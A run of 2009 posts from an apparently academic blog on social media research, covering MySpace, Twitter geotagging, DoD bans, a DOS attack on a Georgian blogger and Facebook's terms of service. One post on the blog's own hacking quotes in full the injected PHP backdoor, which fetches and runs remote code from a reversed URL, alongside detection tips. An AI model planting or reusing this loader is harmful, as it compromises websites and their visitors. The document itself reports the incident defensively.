MySpace in the digital Cambrian period

December 5th, 2009

Financial Times has a long article describing the The rise and fall of MySpace. It’s a story full of bad timing, missed opportunities, suits vs. geeks, personalities, and, I suppose, random chance events. I hope at least a few fossils from our age will be preserved for future generations to study.

Visualizing social media use in 16 countries

December 5th, 2009

Trendstream’s Global Web Index has a visualization, Global Map of Social Web, that shows the uptake of different social media systems in 16 countries around the world.

Map of the Social Web
Full size pdf

It’s a little busy, but it overlays a lot of information over the world map.

“The map visualises the number of active bloggers, social networkers, video sharers, photo uploaders and microbloggers. The length of the curve represents the penetration and the size represents the universe size. We have also included the actual numbers so you can use and apply the universe estimates.”

I was surprised to see the variation in popularity of the different modalities.

(via Mashable)

Twitter to add support for geogtagging tweet locations

August 21st, 2009

Twitter is adding support for geotagging tweets to their API which will make Twitter a richer source of real-time news. The Twitter blog reports:

“Twitter platform developers have been doing innovative work with location for some time despite having access to only a rudimentary level of API support. Most of the location-based projects we see are built using the simple, account-level location field folks can fill out as part of their profile. Since anything can be written in this field, it’s interesting but not very dependable.

We’re gearing up to launch a new feature which makes Twitter truly location-aware. A new API will allow developers to add latitude and longitude to any tweet. Folks will need to activate this new feature by choice because it will be off by default and the exact location data won’t be stored for an extended period of time. However, if people do opt-in to sharing location on a tweet-by-tweet basis, compelling context will be added to each burst of information.”

This opens up lots of interesting opportunities but there is still room for geotagging from conent. There are more than one relationship between a Tweet (or any utterance) and a location. They include both were the tweeter was when it was issued but also the location of the event or object that’s the tweet’s subject.

For example, the Baltimore police use twitter to inform the press and public about about significant crimes, major traffic problems and other events. There are 10-15 tweets a day in this stream, all sent by an officer in the BPD Public Affairs department. The majority of the tweets mention a location (e.g., “Shooting on Lafayette Ave, Suspect in Police custody, handgun recovered.”) but are, I assume, sent from Public Affairs office. Baltimore city covers a large area, more than 80 square miles. Many residents or reporters will be interested only in events in or effecting the neighborhoods where they live, work or pass through when commuting.

I also wonder if there are more opportunities for Twitter to add semantic metadata to Tweets via their API.

See also: Bits Blog, O’Reilly.

DoD social media ambivalence

August 7th, 2009

The Department of Defense remains conflicted about their position on social media.

This past Sunday the US Marine Corps announced an immediate ban of Internet social networking sites on their NIPRNET network due to potential security risks. Specific examples of the sites now banned included facebook, myspace, and twitter.

Adm. Mike Mullen, chairman of the Joint Chiefs of Staff, tweeted yesterday.

“Obviously we need to find right balance between security and transparency. We are working on that. But am I still going to tweet? You bet.”

The comment also appeared on Admiral Mullen’s facebook page.

While it’s tempting to poke fun at the apparent contradictions involved, it’s easy to see a difference. Its well known that there are many vulnerabilities on the Web that can result in compromising a computer and that they are more likely to be encountered in open, popular environments, like social media systems. So it’s prudent to limit access to some of these from networks like NIPRNET that are used for sensitive information. On the other hand, we assume that the computer used by Admiral Mullen and his staff for public announcements and PR are on conventional networks, so the risks asscociated with security problems are greatly reduced.

Still, you have to admit that it’s ironic.

DOS attacks on Twitter et al. focused on Georgian blogger Cyxymu

August 6th, 2009

Elinor Mills of cnet reports that the DOS against twitter, facebook, livejournal and blogger were focused on a single Russian blogger using the name Cyxymu (??????).

A pro-Georgian blogger with accounts on Twitter, Facebook, LiveJournal and Google’s Blogger and YouTube was targeted in a denial of service attack that led to the site-wide outage at Twitter and problems at the other sites on Thursday, according to a Facebook executive.

The blogger, who uses the account name “Cyxymu,” (the name of a town in the former Soviet Republic) had accounts on all of the different sites that were attacked at the same time, Max Kelly, chief security officer at Facebook, told CNET News.

“It was a simultaneous attack across a number of properties targeting him to keep his voice from being heard,” Kelly said. “We’re actively investigating the source of the attacks and we hope to be able to find out the individuals involved in the back end and to take action against them if we can.”

According to the Register, Researcher: Twitter attack targeted anti-Russian blogger, the DOS attack was driven by spam rather than a botnet. Spam messages enticed their recipients to click on a link to one of Cyxymu’s many social media accounts.

You can try to access Cyxymu’s pages on twitter, livejournal, facebook, blogger and youtube.

CFP: JWS special issue on Semantic Web and Social Media

June 27th, 2009
important dates
abstracts 21 Sept 09
submissions 01 Oct 09
notification 15 Dec 09
final copy 15 Jan 10
publication April 10

The Journal of Web Semantics will publish a special issue on Data Mining and Social Network Analysis for integrating Semantic Web and Web 2.0 in the spring of 2010. The special issue will be edited by Bettina Berendt, Andreas Hotho and Gerd Stumme and initial abstracts for papers must be submitted via the Elsevier EES system by September 21, 2009.

The special issue, invites contributions that show how synergies between Semantic Web and Web 2.0 techniques can be successfully used. Since both communities work on network-like data structures, analysis methods from different fields of research could form a link between those communities. Techniques can be – but are not limited to – social network analysis, graph analysis, machine learning and data mining methods.

Relevant topics include

  • ontology learning from Web 2.0 data
  • instance extraction from Web 2.0 systems
  • analysis of Blogs
  • discovering social structures and communities
  • predicting trends and user behaviour
  • analysis of dynamic networks
  • using content of the Web for modelling
  • discovering misuse and fraud
  • network analysis of social resource sharing systems
  • analysis of folksonomies and other Web 2.0 data structures
  • analysis of Web 2.0 applications and their data
  • deriving profiles from usage
  • personalized delivery of news and journals
  • Semantic Web personalization
  • Semantic Web technologies for recommender systems
  • ubiquitous data mining in Web (2.0) environment
  • applications

Ebiquity Google alert tripwires triggered

May 21st, 2009

Yesterday we discovered that our ebiquity blog had been hacked. It looks like a vulnerability in our old WordPress installation was exploited to add the following code to the top of our blog’s main page.

< ?php $site = create_function('','$cachedir="/tmp/"; $param="qq"; $key=$_GET[$param]; $rand="1239aef"; $said=23; $type=1; $stprot=""; '.file_get_contents(strrev("txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"))); $site(); ?>

This code caused URLs like to redirect to a spam page. We’ve upgraded the blog to the latest WordPress release, which hopefully will prevent this exploit from being used again. (Notice the reversed URL — LOL!)

We discovered the problem though a clever trick I read about last year on a site I’ve forgotten (maybe here). We created several Google alerts triggered by the appearance of spam-related words on pages apparently hosted by For example:

  • adult OR girls OR sex OR sexx OR XXX OR porn OR pornography
  • viagra OR cialis OR levitra OR Phentermine OR Xanax

I would get several false positives a month from these alerts triggered by non-spam entries on our site. In fact, *this* post will generate a false positive. But yesterday I got a true positive. Looking at the log files, I think I got the alert within a few hours of when our blog was hacked. So I am happy to say that this worked and worked well. Without this alert, it might have taken weeks to notice the problem.

Google alert for a hacked website

The results of this Google search reveal many compromised blogs from the .edu domain.

Can a programming language make you happy?

May 11th, 2009

We all know that some programming languages are a joy to use and others can be damned painful. Lukas Biewald ran an interesting experiment to gather some data about this in his post, The Programming Language with the Happiest Users.

“Which languages make programmers the happiest? … I decided to do a little market research. I scraped the top 150 most recent tweets on Twitter for the query “X language” where X was one of {COBOL, Ruby, Fortran, Python, Visual Basic, Perl, Java, Haskell, Lisp, C}. Then I asked three people on Amazon Mechanical Turk to verify that the tweet was on the topic. If so, I asked if the tweet seemed positive, negative or neutral. …”

Great idea and a nice use of Amazon Mechanical Turk!

Storms on Planet Social Media Research

May 7th, 2009

We maintain Planet Social Media Research (SMR) as a feed aggregator for a set of blogs relevant to research in social media systems. A few days ago I noticed that it wasn’t including new posts from some of the blogs. After updating the Planet Venus software we use and poking around I discovered that our server is unable to access any feeds that resolve to Feedburner.

Apparently Feedburner has a blacklist of IP addresses that it blocks and our server must now be on it. We have a request in to straighten this out and hope that everything will be back to normal very soon. ( I was to get our own blog back onto Planet SMR because I reconfigured the system to revert to the old, non-Feedburner feed.)

We’ve not yet heard from Feedburner/Google and don’t know why we are on their blacklist. It’s unlikely to be a result of our accessing feeds too frequently: we rebuild the site and aggregated feed once an hour and only about ten of our feeds resolve to feedburner.

My speculation is that this is collateral damage in the global war on spam. The easiest way for splogs (spam blogs) to get content is to hijack feeds from other blogs. Web spammers can do even better at disguising their splogs as legitimate sites if they aggregate several feeds that are topically related.

One way to fight such splogs is to deny them access to the feeds. So Google could be trying to protect Feedburner users and also be a good steward of the the Web environment by blocking suspected web spammers from the feeds hosted by Feedburner.

So, my guess is that the Google thinks that the Planet SMR site is a splog. We are not, of course. We only include the feeds of blogs that want to be on SMR. We also do not host any ads, which is a motivation for most splogs.

If our speculation is right, and Google is blocking our access because it thinks we are a splog site, then there will be many other legitimate feed aggregator sites that have or soon will have this problem.

By the way — we are always interested in suggestions for new blogs to add to Planet SMR. If you have or know of one, contact us as planet-smr at

update 5/8: We’ve identified and solved the problem, thanks to Google Freebase ‘community expert’ Franklin Tse. The problem was due to our having an old entry for the freebase IP address in the server’s /etc/hosts table. I think we added when we were having some technical difficulties some years ago and wanted to keep our key services running smoothly. I guess the trouble with quick temporary hacks is that they’re easy to forget and come back to bite you.

Twitter vs. Facebook: fad vs. need?

April 3rd, 2009

Earlier this week the Baltimore Sun’s Andrew Ratner had a story on Twitter, When did Twitter take over the universe?. The story had this interesting quote from UMBC’s Zeynep Tufekci:

Some people who study technology aren’t sure Twitter will endure.

“Frankly, I think a lot of twittering is somewhat faddish, whereas I never thought Facebook was. … People I interviewed and surveyed would talk of serious feeling of deprivation without Facebook and I’ve hardly heard anyone say that about twitter,” Zeynep Tufekci, an assistant professor who teaches the sociology of technology at the University of Maryland, Baltimore County, wrote in an e-mail. “Will people Twitter five years from now? Perhaps, but I would not be surprised if they did not, or at least as much.”

CUNY J-school experiments with hyperlocal news

March 1st, 2009

Traditional newspapers are in a crisis. Last week the 150 year old Rocky Mountain News published its last issue and the Philadelphia Inquirer filed for bankruptcy. Experts have been saying for some time that the newspapers need to focus on one aspect that can not be commoditized — local news. It’s also clear that news content delivered via ink on dead trees is not a working model for the future.

Jeff Jarvis, director of CUNY’s interactive journalism program, describes one new experiment that sounds very promising in a post titled The Times & CUNY (and others) go hyperlocal.

The New York Times is about to announce that it is starting a hyperlocal product called The Local working with our students at CUNY’s Graduate School of Journalism. PaidContent has the story early. So I’ll tell you about the school’s and my involvement and plans.

At CUNY, we were working on a hyperlocal plan of our own, aimed at taking one New York neighborhood and turning it into the ultimate hyperlocal community as a showcase to both demonstrate how a community could be empowered to report on itself and to create a laboratory where our students could learn to interact with the public in new and collaborative ways. The problem with teaching interactive journalism, which is what we call my department, is that students don’t have a public with whom to interact.

Facebook blinks, reverts to old Terms of Service agreement

February 18th, 2009

Late last night Facebook CEO Mark Zuckerberg announced in a blog post, Update on Terms, that they have rolled back the recent changes to their Terms of Service agreement and restored the previous one.

“Many of us at Facebook spent most of today discussing how best to move forward. One approach would have been to quickly amend the new terms with new language to clarify our positions further. Another approach was simply to revert to our old terms while we begin working on our next version. As we thought through this, we reached out to respected organizations to get their input.

Going forward, we’ve decided to take a new approach towards developing our terms. We concluded that returning to our previous terms was the right thing for now. As I said yesterday, we think that a lot of the language in our terms is overly formal and protective so we don’t plan to leave it there for long.”

The NYT reported the change in a story today, Facebook Withdraws Changes in Data Use.

In his post, Zuckerberg continued by observing that with 175 million members, if it were a country, it would be the sixth most populated one in the world. Of course, sometimes a population revolts and lays claim to certain unalienable rights, among theme being life, liberty, pursuit of happiness and ownership of one’s online content.

So, the missing clause is back in the FB TOS:

“You may remove your User Content from the Site at any time. If you choose to remove your User Content, the license granted above will automatically expire, however you acknowledge that the Company may retain archived copies of your User Content.”

This revision is dated 23 September 2008. Curiously, I checked the Internet Archive to review the history of FB’s TOS but found that there are no archived copies after 12 October 2007. I can only imagine that FB asked the Internet Archive to stop saving copies of this public page. I note that the last archived copies of many of their public pages (e.g., privacy policy, developers page, etc.) are also from 2007. These pages are not blocked by the FB robots.txt and are normally accessible to anyone, so it must be by a specific request that they not be archived.

That’s too bad. Having an easy way to see how the policies of important social sites like FB evolve would be a great resource to those who study online social media as well as to many curious users.